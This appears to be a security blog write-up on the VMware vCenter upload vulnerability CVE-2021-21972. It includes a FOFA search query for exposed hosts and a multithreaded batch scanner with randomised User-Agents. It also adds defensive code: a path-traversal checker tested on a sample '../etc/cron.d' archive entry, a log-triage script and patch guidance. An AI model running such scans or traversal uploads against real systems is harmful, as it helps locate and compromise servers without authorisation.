About the VMware vcenter unauthorized arbitrary file upload vulnerability (CVE-2021-21972)

background

CVE-2021-21972 is an unauthenticated remote code execution vulnerability in the vSphere Client (HTML5) of VMware vCenter Server, published in VMSA-2021-0002 with a CVSSv3 score of 9.8. The vRealize Operations plugin bundled with the client exposes an upload endpoint (/ui/vropspluginui/rest/services/uploadova) that requires no authentication. The uploaded archive is unpacked on the server and the entry names inside it are not validated, so an attacker can write a file to an arbitrary location on the vCenter host (for example a webshell under the web root on Windows installs) and then execute it.
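The file-write primitive described above is an archive entry name used as a destination path without validation. As an added example (my own code, not VMware's and not the POC from this article), the naive join is shown beside a hardened form that resolves the path and refuses anything outside the extraction directory. The directory name and the sample archive are assumptions constructed for illustration; the traversal entry is rejected, the legitimate one accepted.

```python
import io
import os
import tarfile

# Assumed extraction directory, for illustration only.
UPLOAD_DIR = "/tmp/unicorn_ova_dir"


def naive_dest(base_dir, entry_name):
    """Vulnerable pattern: the attacker-chosen entry name is glued onto base_dir
    and the OS resolves any '..' components, so the write can leave base_dir."""
    return os.path.normpath(base_dir + "/" + entry_name)


def safe_dest(base_dir, entry_name):
    """Hardened form: refuse absolute names and any path that resolves outside base_dir."""
    if os.path.isabs(entry_name) or entry_name.startswith(("/", "\\")):
        raise ValueError("absolute entry name rejected: %r" % entry_name)
    base = os.path.realpath(base_dir)
    dest = os.path.realpath(os.path.join(base, entry_name))
    # realpath also follows pre-existing symlinks, so a link planted earlier
    # under base_dir cannot redirect a later write outside it.
    if os.path.commonpath([base, dest]) != base:
        raise ValueError("traversal rejected: %r" % entry_name)
    return dest


def is_safe_entry(base_dir, entry_name):
    try:
        safe_dest(base_dir, entry_name)
        return True
    except ValueError:
        return False


def build_tar(entries):
    """Build a constructed sample archive in memory: entries maps name -> bytes."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in entries.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def check_archive(tar_bytes, base_dir=UPLOAD_DIR):
    """Split the entries of an uploaded tar into (accepted, rejected) names.
    Only regular files with in-tree names are accepted; symlinks, hard links,
    devices and directories are rejected here because each needs its own handling."""
    accepted, rejected = [], []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for member in tar.getmembers():
            if member.isfile() and is_safe_entry(base_dir, member.name):
                accepted.append(member.name)
            else:
                rejected.append(member.name)
    return accepted, rejected


# Constructed sample upload: one legitimate OVA component and one traversal entry.
SAMPLE_TAR = build_tar({
    "ova/disk1.vmdk": b"KDMV",
    "../../../etc/cron.d/evil": b"* * * * * root id\n",
})

if __name__ == "__main__":
    print("naive write lands at:", naive_dest(UPLOAD_DIR, "../../../etc/cron.d/evil"))
    print("accepted/rejected:", check_archive(SAMPLE_TAR))
```

The check has to run on the resolved path, not on the string: stripping "../" from names is bypassable ("....//"), whereas comparing realpath results against the base directory is not.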

Affected versions

vmware:vcenter_server:7.0 (before 7.0 U1c)
vmware:vcenter_server:6.7 (before 6.7 U3l)
vmware:vcenter_server:6.5 (before 6.5 U3n)
VMware Cloud Foundation 4.x and 3.x (they bundle the affected vCenter Server)

ESXi itself is not affected by CVE-2021-21972. The ESXi entry in the same advisory (VMSA-2021-0002) is the separate OpenSLP bug CVE-2021-21974, which is often listed alongside this CVE by mistake.

Vulnerability reproduction: FOFA query

Syntax: title="+ ID_VC_Welcome +"

This matches the vSphere Client login page, whose HTML title still contains the unresolved ID_VC_Welcome placeholder, so it finds exposed vCenter web interfaces regardless of version.

POC

Send an unauthenticated GET to:

https://xxxx/ui/vropspluginui/rest/services/uploadova

The endpoint only accepts POST, so a vulnerable vCenter answers 405 Method Not Allowed: the servlet is reachable without a session and rejects nothing but the verb. A 405 shows only that the unauthenticated upload endpoint is exposed; it does not by itself prove that the file write succeeds. Any other status (401, 404) should be recorded as "endpoint not reachable" rather than "patched" unless the build number has also been checked.
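The same request pattern is what a defender should be hunting for: scanners send the unauthenticated GET and collect 405s, a real attack follows with a POST. As an added example (my own code, not from the article or the POC repository), this triages web access logs for hits on the upload endpoint. The log layout is assumed to be the Tomcat/Apache common format and the sample lines are constructed; adjust the pattern to the real vsphere-ui access log on your appliance.

```python
import re
from collections import defaultdict

UPLOAD_PATH = "/ui/vropspluginui/rest/services/uploadova"

# Assumed Tomcat/Apache common access-log layout:
# <ip> <ident> <user> [<timestamp>] "<method> <path> <proto>" <status> <size>
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def classify(events):
    """Count hits on the upload endpoint per source IP.
    GET  -> probe (scanners look for the 405)
    POST -> upload attempt; a 200 means the server accepted the archive
    """
    per_ip = defaultdict(lambda: {"probes": 0, "uploads": 0, "accepted_uploads": 0})
    for ev in events:
        if ev is None or not ev["path"].startswith(UPLOAD_PATH):
            continue
        rec = per_ip[ev["ip"]]
        if ev["method"] == "GET":
            rec["probes"] += 1
        elif ev["method"] == "POST":
            rec["uploads"] += 1
            if ev["status"] == "200":
                rec["accepted_uploads"] += 1
    return dict(per_ip)


def triage(log_lines):
    """Turn per-IP counts into (ip, severity, reason) alerts, most severe reason first."""
    findings = classify(parse_line(line) for line in log_lines)
    alerts = []
    for ip, rec in findings.items():
        if rec["accepted_uploads"]:
            alerts.append((ip, "HIGH", "unauthenticated upload accepted (HTTP 200 on POST)"))
        elif rec["uploads"]:
            alerts.append((ip, "MEDIUM", "upload attempted"))
        elif rec["probes"]:
            alerts.append((ip, "LOW", "endpoint probed"))
    return sorted(alerts)


# Constructed sample log: one scan-then-upload sequence, one bare probe, one unrelated hit.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Feb/2021:10:01:02 +0000] "GET /ui/vropspluginui/rest/services/uploadova HTTP/1.0" 405 0
203.0.113.7 - - [24/Feb/2021:10:01:09 +0000] "POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1" 200 17
198.51.100.4 - - [24/Feb/2021:10:05:41 +0000] "GET /ui/vropspluginui/rest/services/uploadova HTTP/1.0" 405 0
192.0.2.9 - - [24/Feb/2021:10:07:00 +0000] "GET /ui/login HTTP/1.1" 200 1234
""".splitlines()

if __name__ == "__main__":
    for ip, severity, reason in triage(SAMPLE_LOG):
        print(ip, severity, reason)
```

A HIGH entry means an archive was accepted from an unauthenticated client; treat the host as compromised until the files written around that timestamp have been reviewed, because the POC scripts only ever send the GET.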

Use https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC script for batch verification

#-*- coding:utf-8 -*-
banner = """
    888888ba dP           
    88 `8b 88           
    a88aaaa8P' .d8888b. d8888P .d8888b. dP dP 
    88 `8b. 88' `88 88 Y8ooooo. 88 88 
    88 .88 88. .88 88 88 88. .88 
    88888888P `88888P8 dP `88888P' `88888P' 
  ooooooooooooooooooooooooooooooooooooooooooooooooooooo 
        @time:2021/02/24 CVE-2021-21972.py
        C0de by NebulabdSec - @batsu         
 """
print(banner)

import argparse
import http.client
import random
from concurrent.futures import ThreadPoolExecutor

import requests
import urllib3

# vCenter normally runs with a self-signed certificate; silence the TLS warning instead of failing.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Send the request line as HTTP/1.0.
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'

TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"
OUTPUT_FILE = "vulnerable_urls.txt"

# Optional proxy for all requests, e.g.
# {"http": "socks5://127.0.0.1:1081", "https": "socks5://127.0.0.1:1081"} (needs requests[socks]).
PROXIES = None

def get_ua():
  """Build a random Chrome-style User-Agent so scans do not share one fingerprint."""
  first_num = random.randint(55, 62)
  third_num = random.randint(0, 3200)
  fourth_num = random.randint(0, 140)
  os_type = [
    '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',
    '(Macintosh; Intel Mac OS X 10_12_6)'
  ]
  chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)

  ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
          '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
         )
  return ua

def CVE_2021_21972(url):
  """Unauthenticated GET to the upload endpoint. The handler only accepts POST, so a
  405 means the servlet is reachable without a session: the vulnerable configuration."""
  headers = {
    'User-Agent': get_ua(),
    "Content-Type": "application/x-www-form-urlencoded"
  }
  targetUrl = url.rstrip("/") + TARGET_URI
  try:
    res = requests.get(targetUrl,
              headers=headers,
              timeout=15,
              verify=False,
              proxies=PROXIES)
    if res.status_code == 405:
      print("[+] URL:{}--------CVE-2021-21972 vulnerability exists".format(url))
      with open(OUTPUT_FILE, 'a') as fw:
        fw.write(url + '\n')
    else:
      print("[-] " + url + " No CVE-2021-21972 vulnerability was found (HTTP {}).\n".format(res.status_code))
  except requests.RequestException as e:
    print("[-] " + url + " Request ERROR: " + str(e) + "\n")

def multithreading(filename, pools=5):
  """Check every non-empty line of filename (one URL per line) with a thread pool."""
  with open(filename, "r") as f:
    urls = [line.strip() for line in f if line.strip()]
  with ThreadPoolExecutor(max_workers=pools) as pool:
    list(pool.map(CVE_2021_21972, urls))

def main():
  parser = argparse.ArgumentParser()
  parser.add_argument("-u",
            "--url",
            help="Target URL; Example:http://ip:port")
  parser.add_argument("-f",
            "--file",
            help="Url File; Example:url.txt")
  args = parser.parse_args()
  url = args.url
  file_path = args.file
  if url is not None and file_path is None:
    CVE_2021_21972(url)
  elif url is None and file_path is not None:
    multithreading(file_path, 10)  # 10 worker threads
  else:
    parser.print_help()

if __name__ == "__main__":
  main()

Fix suggestions

Upgrade vCenter Server 7.0 to 7.0 U1c
Upgrade vCenter Server 6.7 to 6.7 U3l
Upgrade vCenter Server 6.5 to 6.5 U3n

If patching has to wait, VMware's workaround (KB 82374) disables the vRealize Operations plugin by marking it incompatible in the vSphere Client's compatibility-matrix.xml and restarting the vsphere-ui service, after which the uploadova endpoint is no longer served. The workaround removes the exposed endpoint but not the underlying bug; verify after either measure that the endpoint no longer answers unauthenticated requests, and keep the vSphere Client off the public Internet regardless.
